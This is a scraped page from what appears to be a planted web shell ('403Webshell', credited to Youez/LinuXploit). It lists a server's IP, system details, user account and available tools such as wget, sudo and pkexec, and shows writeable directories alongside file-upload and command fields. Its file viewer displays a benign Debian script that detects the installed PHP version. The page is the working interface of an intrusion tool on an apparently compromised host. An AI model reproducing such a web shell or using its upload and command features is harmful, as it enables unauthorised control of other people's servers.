403Webshell
Server IP : 37.9.174.138  /  Your IP : 216.73.216.117
Web Server : Apache
System : Linux vps6.backend.sk 6.12.100+deb13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.100-1 (2026-07-30) x86_64
User : ftpuser ( 1001)
PHP Version : 8.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/wwwconfig-common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/wwwconfig-common/php.get
# File:		php.get
# Changes:
#	20010219 Ola Lundqvist <opal@debian.org>
#	20010430 Ola Lundqvist <opal@debian.org>
#		Removed bash specific dependency.
#	20011022 Luca De Vitis <luca@debian.org>
#		Allowed reinclusion.
#	20020116 Ola Lundqvist <opal@debian.org>
#		Documented the reinclusion.
#	20020126 Ola Lundqvist <opal@debian.org>
#		Removed reinclusion.
# Needs:	/usr/share/wwwconfig-common/php.get
#		$extensions - what php extensions to check for!
# Description:	Sets the phpver and phpini variables to the version
#		of php that are installed.
# Sets:         $phpver = {php3, php4}
#               $phpini = {/etc/php4/apache/php.ini, /etc/php3/apache/php3.ini}

for A in php3 php4 ; do
    B=$(echo "$A" | sed -e "s|4||g;")
    I=/etc/$A/apache/$B.ini
    if [ -f $I ] ; then
	phpver=$A
	phpini=$I
    fi
done
phpini=${phpini:-none}

Youez - 2016 - github.com/yon3zu
LinuXploit